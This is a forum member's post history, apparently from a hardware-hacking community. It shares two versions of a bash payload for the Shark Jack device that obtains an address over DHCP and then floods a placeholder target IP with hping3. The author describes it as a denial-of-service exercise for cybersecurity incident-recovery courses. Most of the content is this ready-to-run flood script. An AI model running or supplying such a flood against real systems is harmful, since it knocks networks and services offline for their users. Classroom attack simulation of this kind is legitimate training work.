Jump to content

Sourison

Members
  • Posts

    3
  • Joined

  • Last visited

Everything posted by Sourison

  1. btw the ip addresses are my "lab ip's.. so it's not a secret 😉"
  2. Thank you Darren for your reply, I really appreciate your help 🙂 Below I've added the new code. #!/bin/bash # # Title: denial of service on the Shark Jack # Author: Sourison # Version: 1.1.0 # # Magenta...........Setup # Yellow..........Running # ##Hping options, Change TARGET_IP to the target ip address HPING_OPTIONS="--flood -c 4096 TARGET_IP" function setup() { LED SETUP # Set NETMODE to DHCP_CLIENT for Shark Jack v1.1.0+ NETMODE DHCP_CLIENT # Wait for an IP address to be obtained while ! ifconfig eth0 | grep "inet addr"; do sleep 1; done } function run() { # Run setup setup LED ATTACK # Start scan hping3 $HPING_OPTIONS finish } # Run payload run & Kind Regards Joshua (Sourison)
  3. #!/bin/bash # # Title: denial of service on the Shark Jack # Author: Sourison # Version: 1.1.0 # # Red ...........Setup # Magenta..........Running # ##Hping options, Change TARGET_IP to the target ip address HPING_OPTIONS="--flood -c 4096 TARGET_IP" function setup() { LED R # Set NETMODE to DHCP_CLIENT for Shark Jack v1.1.0+ NETMODE DHCP_CLIENT # Wait for an IP address to be obtained while ! ifconfig eth0 | grep "inet addr"; do sleep 1; done } function run() { # Run setup setup LED M # Start scan hping3 $HPING_OPTIONS finish } # Run payload run & Good Morning all, I've just create an HPING flood "attack" for a specified target. I tempt to use this alot in our cybersecurity courses when they need to do incident recovery and start fixing their systems. This part is nice when they just plug the cables and forget about the contaiment parts.. Feel free to edit/make it better. I'll attach the payload.sh Kind regards Joshua (Sourison) payload.sh
×
×
  • Create New...